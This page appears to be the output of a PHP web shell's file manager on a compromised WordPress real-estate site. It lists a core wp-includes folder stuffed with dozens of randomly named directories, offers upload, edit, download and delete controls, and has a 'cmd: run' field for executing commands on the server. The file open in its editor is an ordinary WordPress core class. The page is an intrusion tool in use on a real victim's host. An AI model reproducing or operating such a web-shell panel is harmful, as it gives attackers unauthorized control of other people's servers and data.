/
home
/
vianto5
/
realtylifestyleproperties.mx
/
wp-includes
/
html-api
/
/home/vianto5/realtylifestyleproperties.mx/wp-includes/html-api
mkdir
upload
Name
Size
Mode
Actions
1kuazmw/
-
0755
rm
1prhbvy/
-
0755
rm
1shmerq/
-
0755
rm
1ufjmwc/
-
0755
rm
anbtzky/
-
0755
rm
atzwqlu/
-
0755
rm
bdtlzxn/
-
0755
rm
bflownd/
-
0755
rm
cqnikyg/
-
0755
rm
ctflkjs/
-
0755
rm
cwiftxg/
-
0755
rm
cwqeg1k/
-
0755
rm
dkjyaqo/
-
0755
rm
dtvoibc/
-
0755
rm
dv1iarb/
-
0755
rm
eizuogm/
-
0755
rm
emqbjwu/
-
0755
rm
eprnvfy/
-
0755
rm
ertvlo1/
-
0755
rm
fhtujyg/
-
0755
rm
fplbkur/
-
0755
rm
fspmcvd/
-
0755
rm
grmdnya/
-
0755
rm
gxipsny/
-
0755
rm
h1yxfzq/
-
0755
rm
hajmyf1/
-
0755
rm
hoiuyaq/
-
0755
rm
hwmltef/
-
0755
rm
ildexfn/
-
0755
rm
iqbxugd/
-
0755
rm
isgqmla/
-
0755
rm
izoalgv/
-
0755
rm
j1pekbm/
-
0755
rm
j1zfpml/
-
0755
rm
jan1fow/
-
0755
rm
jtwrybe/
-
0755
rm
kgbodev/
-
0755
rm
kozifra/
-
0755
rm
kvgeqls/
-
0755
rm
kwzjxqd/
-
0755
rm
mkacjuh/
-
0755
rm
mnzsadx/
-
0755
rm
norehlv/
-
0755
rm
nqohszj/
-
0755
rm
oaxbkhs/
-
0755
rm
ocnkjxy/
-
0755
rm
oq1hskg/
-
0755
rm
plsxudy/
-
0755
rm
pxmwqbn/
-
0755
rm
qdmivuy/
-
0755
rm
qjudipv/
-
0755
rm
qkbiup1/
-
0755
rm
qoefylh/
-
0755
rm
rfxldgb/
-
0755
rm
rlseqjb/
-
0755
rm
rshwxgt/
-
0755
rm
rzlejpq/
-
0755
rm
tmzrxnd/
-
0755
rm
tvxr1dw/
-
0755
rm
twvynzb/
-
0755
rm
ulcmrgp/
-
0755
rm
uqnmvbg/
-
0755
rm
uwxmlgs/
-
0755
rm
vrotupi/
-
0755
rm
wcrexht/
-
0755
rm
wofnqji/
-
0755
rm
wptxuc1/
-
0755
rm
wr1bgfj/
-
0755
rm
wthnizp/
-
0755
rm
wyzuito/
-
0755
rm
ydkwueq/
-
0755
rm
yem1hvn/
-
0755
rm
yphsixg/
-
0755
rm
yrozfxt/
-
0755
rm
yxczi1k/
-
0755
rm
zgewcbh/
-
0755
rm
ztfsycl/
-
0755
rm
zyksxvd/
-
0755
rm
.htaccess
178
0644
edit
dl
rm
class-wp-html-active-formatting-elements.php
7264
0644
edit
dl
rm
class-wp-html-attribute-token.php
2775
0644
edit
dl
rm
class-wp-html-decoder.php
16692
0644
edit
dl
rm
class-wp-html-doctype-info.php
25357
0644
edit
dl
rm
class-wp-html-open-elements.php
22478
0644
edit
dl
rm
class-wp-html-processor-state.php
11335
0644
edit
dl
rm
class-wp-html-processor.php
212203
0644
edit
dl
rm
class-wp-html-span.php
1099
0644
edit
dl
rm
class-wp-html-stack-event.php
1639
0644
edit
dl
rm
class-wp-html-tag-processor.php
146932
0644
edit
dl
rm
class-wp-html-text-replacement.php
1409
0644
edit
dl
rm
class-wp-html-token.php
3410
0644
edit
dl
rm
class-wp-html-unsupported-exception.php
3606
0644
edit
dl
rm
html5-named-character-references.php
80163
0644
edit
dl
rm
Edit:
/home/vianto5/realtylifestyleproperties.mx/wp-includes/html-api/class-wp-html-stack-event.php
(1639B)
<?php /** * HTML API: WP_HTML_Stack_Event class * * @package WordPress * @subpackage HTML-API * @since 6.6.0 */ /** * Core class used by the HTML Processor as a record for stack operations. * * This class is for internal usage of the WP_HTML_Processor class. * * @access private * @since 6.6.0 * * @see WP_HTML_Processor */ class WP_HTML_Stack_Event { /** * Refers to popping an element off of the stack of open elements. * * @since 6.6.0 */ const POP = 'pop'; /** * Refers to pushing an element onto the stack of open elements. * * @since 6.6.0 */ const PUSH = 'push'; /** * References the token associated with the stack push event, * even if this is a pop event for that element. * * @since 6.6.0 * * @var WP_HTML_Token */ public $token; /** * Indicates which kind of stack operation this event represents. * * May be one of the class constants. * * @since 6.6.0 * * @see self::POP * @see self::PUSH * * @var string */ public $operation; /** * Indicates if the stack element is a real or virtual node. * * @since 6.6.0 * * @var string */ public $provenance; /** * Constructor function. * * @since 6.6.0 * * @param WP_HTML_Token $token Token associated with stack event, always an opening token. * @param string $operation One of self::PUSH or self::POP. * @param string $provenance "virtual" or "real". */ public function __construct( WP_HTML_Token $token, string $operation, string $provenance ) { $this->token = $token; $this->operation = $operation; $this->provenance = $provenance; } }
Save
cmd:
run